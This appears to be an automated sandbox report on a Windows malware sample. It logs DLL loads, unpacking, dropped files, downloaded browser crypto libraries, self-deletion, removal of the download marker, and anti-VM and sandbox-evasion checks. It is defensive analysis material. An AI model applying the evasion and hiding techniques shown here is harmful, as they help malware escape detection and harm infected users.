Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5358.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5358.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5358.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5358.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5358.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\3.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: 3.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: kat2225.tmp, 00000009.00000002.3206547696.000000006F8FD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr
Source:	Binary string: freebl3.pdb source: freebl3.dll.9.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.9.dr
Source:	Binary string: nss3.pdb@ source: kat2225.tmp, 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.9.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.9.dr, vcruntime140.dll.9.dr
Source:	Binary string: nss3.pdb source: kat2225.tmp, 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr
Source:	Binary string: mozglue.pdb source: kat2225.tmp, 00000009.00000002.3206547696.000000006F8FD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.9.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\3.exe	Unpacked PE file: 0.2.3.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Unpacked PE file: 5.2.A247.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\A247.exe

Unpacked PE file: 5.2.A247.exe.400000.0.unpack

Source: sqls[1].dll.9.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.9.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.9.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.9.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.9.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.9.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.9.dr	Static PE information: section name: .didat
Source: nss3.dll.9.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.9.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.9.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.9.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\3.exe	Code function: 0_2_00402CD7 push cs; retf	0_2_00402CD8
Source: C:\Users\user\Desktop\3.exe	Code function: 0_2_00401EA7 push 0000000Eh; retf 0038h	0_2_00401EB6
Source: C:\Users\user\Desktop\3.exe	Code function: 0_2_004033B6 push eax; ret	0_2_00403419
Source: C:\Users\user\Desktop\3.exe	Code function: 0_2_02D5499B push cs; retf	0_2_02D5499C
Source: C:\Users\user\Desktop\3.exe	Code function: 0_2_02D53986 push ss; iretw	0_2_02D53998
Source: C:\Users\user\Desktop\3.exe	Code function: 0_2_02D53DB9 push cs; retf 0038h	0_2_02D53E38
Source: C:\Users\user\Desktop\3.exe	Code function: 0_2_02D59E65 push 0000002Ah; iretd	0_2_02D59EAF
Source: C:\Users\user\Desktop\3.exe	Code function: 0_2_02D60B01 push esi; ret	0_2_02D60C91
Source: C:\Users\user\Desktop\3.exe	Code function: 0_2_02D5500F push eax; ret	0_2_02D55010
Source: C:\Users\user\Desktop\3.exe	Code function: 0_2_02D53E29 push 0000000Eh; retf 0038h	0_2_02D53E38
Source: C:\Users\user\Desktop\3.exe	Code function: 0_2_02E42D3E push cs; retf	0_2_02E42D3F
Source: C:\Users\user\Desktop\3.exe	Code function: 0_2_02E41F0E push 0000000Eh; retf 0038h	0_2_02E41F1D
Source: C:\Users\user\AppData\Roaming\rcjjrra	Code function: 4_2_00402CD7 push cs; retf	4_2_00402CD8
Source: C:\Users\user\AppData\Roaming\rcjjrra	Code function: 4_2_00401EA7 push 0000000Eh; retf 0038h	4_2_00401EB6
Source: C:\Users\user\AppData\Roaming\rcjjrra	Code function: 4_2_004033B6 push eax; ret	4_2_00403419
Source: C:\Users\user\AppData\Roaming\rcjjrra	Code function: 4_2_02E22D3E push cs; retf	4_2_02E22D3F
Source: C:\Users\user\AppData\Roaming\rcjjrra	Code function: 4_2_02E21F0E push 0000000Eh; retf 0038h	4_2_02E21F1D
Source: C:\Users\user\AppData\Roaming\rcjjrra	Code function: 4_2_02EB40EF push eax; ret	4_2_02EB40F0
Source: C:\Users\user\AppData\Roaming\rcjjrra	Code function: 4_2_02EB2E99 push cs; retf 0038h	4_2_02EB2F18
Source: C:\Users\user\AppData\Roaming\rcjjrra	Code function: 4_2_02EB2A66 push ss; iretw	4_2_02EB2A78
Source: C:\Users\user\AppData\Roaming\rcjjrra	Code function: 4_2_02EB3A7B push cs; retf	4_2_02EB3A7C
Source: C:\Users\user\AppData\Roaming\rcjjrra	Code function: 4_2_02EB8F45 push 0000002Ah; iretd	4_2_02EB8F8F
Source: C:\Users\user\AppData\Roaming\rcjjrra	Code function: 4_2_02EB2F09 push 0000000Eh; retf 0038h	4_2_02EB2F18
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_0063030D push ecx; ret	5_2_00630315
Source: C:\Users\user\AppData\Local\Temp\5358.exe	Code function: 8_2_043BB010 push edx; ret	8_2_043BB21F
Source: C:\Users\user\AppData\Local\Temp\5358.exe	Code function: 8_2_043BA910 push edx; ret	8_2_043BA91B

Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File created: C:\ProgramData\DGHIECGCBKFH\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File created: C:\ProgramData\DGHIECGCBKFH\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File created: C:\ProgramData\DGHIECGCBKFH\softokn3.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\A247.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File created: C:\ProgramData\DGHIECGCBKFH\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File created: C:\ProgramData\DGHIECGCBKFH\mozglue.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\5358.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\rcjjrra	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File created: C:\ProgramData\DGHIECGCBKFH\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\5358.exe	File created: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqls[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File created: C:\ProgramData\DGHIECGCBKFH\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File created: C:\ProgramData\DGHIECGCBKFH\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File created: C:\ProgramData\DGHIECGCBKFH\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File created: C:\ProgramData\DGHIECGCBKFH\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File created: C:\ProgramData\DGHIECGCBKFH\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File created: C:\ProgramData\DGHIECGCBKFH\vcruntime140.dll	Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\rcjjrra

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\3.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\rcjjrra:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5358.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5358.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: kat2225.tmp PID: 6716, type: MEMORYSTR

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rcjjrra	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rcjjrra	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rcjjrra	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rcjjrra	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rcjjrra	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rcjjrra	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\A247.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: rcjjrra, 00000004.00000002.2319460802.0000000002E9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK
Source: kat2225.tmp, 00000009.00000002.3157954757.0000000000422000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL

Source: C:\Users\user\AppData\Local\Temp\A247.exe

Code function: 5_2_008B2CD7 rdtsc

5_2_008B2CD7

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 384	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2725	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 872	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 355	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1956	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 889	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 851	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll	Jump to dropped file
